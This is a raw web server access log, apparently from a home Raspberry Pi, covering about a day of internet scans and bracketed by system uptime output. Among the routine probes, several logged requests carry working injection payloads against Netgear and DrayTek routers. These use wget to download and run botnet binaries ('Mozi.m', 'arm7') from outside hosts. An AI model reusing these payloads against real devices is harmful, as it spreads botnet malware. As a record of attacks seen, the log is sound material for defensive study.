Mon Apr 20 06:25:06 MDT 2020 06:25:06 up 55 days, 10:53, 1 user, load average: 0.29, 0.21, 0.22 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 24Feb20 55days 1:16m 2.53s /usr/bin/lxsession -s LXDE-pi -e LXDE 84.209.31.236 - - [20/Apr/2020:12:32:48 +0000] "GET /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf HTTP/1.1" 404 0 "" "Mozilla/5.0" 84.209.31.236 - - [20/Apr/2020:12:32:50 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 94.102.142.229 - - [20/Apr/2020:12:36:21 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 3.95.14.24 - - [20/Apr/2020:13:25:59 +0000] "GET /.env HTTP/1.1" 404 0 "" "curl/7.58.0" 3.95.14.24 - - [20/Apr/2020:13:48:07 +0000] "GET / HTTP/1.1" 200 25000 "" "curl/7.58.0" 208.91.109.18 - - [20/Apr/2020:14:11:58 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 208.91.109.18 - - [20/Apr/2020:14:11:59 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" "" 115.58.101.168 - - [20/Apr/2020:15:32:03 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://115.58.101.168:42770/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 0 "" "" 178.212.229.58 - - [20/Apr/2020:17:02:58 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 172.104.108.109 - - [20/Apr/2020:17:31:23 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0" 189.58.132.191 - - [20/Apr/2020:17:53:10 +0000] "GET /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf HTTP/1.1" 404 0 "" "Mozilla/5.0" 189.58.132.191 - - [20/Apr/2020:17:53:13 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 192.241.235.76 - - [20/Apr/2020:18:44:25 +0000] "GET /manager/html HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 201.43.202.201 - - [20/Apr/2020:18:44:40 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) 
Version/9.1.2 Safari/601.7.7" 208.91.109.18 - - [20/Apr/2020:19:50:40 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 208.91.109.18 - - [20/Apr/2020:19:50:40 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" "" 80.82.70.118 - - [20/Apr/2020:19:58:50 +0000] "GET / HTTP/1.0" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36" 45.146.253.35 - - [20/Apr/2020:20:13:58 +0000] "GET /phpmyadmin/scripts/setup.php HTTP/1.0" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Safari/537.36" 45.146.253.35 - - [20/Apr/2020:20:14:57 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.0" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Safari/537.36" 45.146.253.35 - - [20/Apr/2020:20:15:56 +0000] "GET /pma/scripts/setup.php HTTP/1.0" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Safari/537.36" 45.146.253.35 - - [20/Apr/2020:20:16:55 +0000] "GET /mysql/scripts/setup.php HTTP/1.0" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Safari/537.36" 45.146.253.35 - - [20/Apr/2020:20:17:55 +0000] "GET /myadmin/scripts/setup.php HTTP/1.0" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Safari/537.36" 45.146.253.35 - - [20/Apr/2020:20:18:55 +0000] "GET /sqladmin/scripts/setup.php HTTP/1.0" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Safari/537.36" 45.146.253.35 - - [20/Apr/2020:20:19:53 +0000] "GET /db/scripts/setup.php HTTP/1.0" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Safari/537.36" 61.153.110.83 - - [20/Apr/2020:20:30:00 +0000] "GET /TP/public/index.php HTTP/1.1" 404 0 "" 
"Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 61.153.110.83 - - [20/Apr/2020:20:30:01 +0000] "GET /TP/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 61.153.110.83 - - [20/Apr/2020:20:30:01 +0000] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 61.153.110.83 - - [20/Apr/2020:20:30:02 +0000] "GET /html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 61.153.110.83 - - [20/Apr/2020:20:30:02 +0000] "GET /public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 61.153.110.83 - - [20/Apr/2020:20:30:03 +0000] "GET /TP/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 61.153.110.83 - - [20/Apr/2020:20:30:03 +0000] "GET /elrekt.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 61.153.110.83 - - [20/Apr/2020:20:30:04 +0000] "GET /index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 61.153.110.83 - - [20/Apr/2020:20:30:04 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 5.196.65.85 - - [20/Apr/2020:21:32:10 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 93.114.147.218 - - [20/Apr/2020:22:36:16 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC" 93.114.147.218 - - [20/Apr/2020:22:36:17 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 81.88.232.81 - - [20/Apr/2020:23:02:25 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 192.241.238.130 - - [20/Apr/2020:23:24:48 +0000] "GET /hudson HTTP/1.1" 404 0 
"" "Mozilla/5.0 zgrab/0.x" 185.216.140.6 - - [20/Apr/2020:23:25:45 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 138.97.41.182 - - [21/Apr/2020:00:11:00 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 74.120.200.170 - - [21/Apr/2020:00:26:09 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7 HTTP/1.1" 400 0 "" "" 74.120.200.170 - - [21/Apr/2020:00:26:09 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 117.157.15.27 - - [21/Apr/2020:01:00:28 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 117.157.15.27 - - [21/Apr/2020:01:00:29 +0000] "GET /TP/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 117.157.15.27 - - [21/Apr/2020:01:00:30 +0000] "GET /TP/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 190.128.226.34 - - [21/Apr/2020:02:07:13 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS HTTP/1.1" 400 0 "" "" 190.128.226.34 - - [21/Apr/2020:02:07:13 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 185.220.44.251 - - [21/Apr/2020:02:08:38 +0000] "GET / HTTP/1.1" 400 0 "" "" 61.219.11.153 - - [21/Apr/2020:03:52:40 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 83.97.20.21 - - [21/Apr/2020:04:40:15 +0000] "GET / HTTP/1.0" 200 25000 "" "" 191.240.24.28 - - [21/Apr/2020:05:01:43 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 192.241.238.92 - - [21/Apr/2020:05:41:28 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 103.212.90.58 - - 
[21/Apr/2020:06:14:06 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 123.200.20.34 - - [21/Apr/2020:06:20:16 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 99.239.96.222 - - [21/Apr/2020:06:25:29 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 99.239.96.222 - - [21/Apr/2020:06:25:30 +0000] "GET / HTTP/1.1" 200 25000 "" "" 95.67.132.214 - - [21/Apr/2020:06:42:37 +0000] "GET / HTTP/1.1" 400 0 "" "" 176.113.115.249 - - [21/Apr/2020:06:44:32 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 93.91.127.133 - - [21/Apr/2020:07:00:31 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 31.40.4.154 - - [21/Apr/2020:07:09:38 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 186.206.244.128 - - [21/Apr/2020:07:17:44 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 189.239.8.242 - - [21/Apr/2020:08:01:39 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC" 189.239.8.242 - - [21/Apr/2020:08:01:39 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" Tue Apr 21 06:25:05 MDT 2020 06:25:06 up 56 days, 10:53, 1 user, load average: 0.27, 0.24, 0.26 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 24Feb20 56days 1:16m 2.53s /usr/bin/lxsession -s LXDE-pi -e LXDE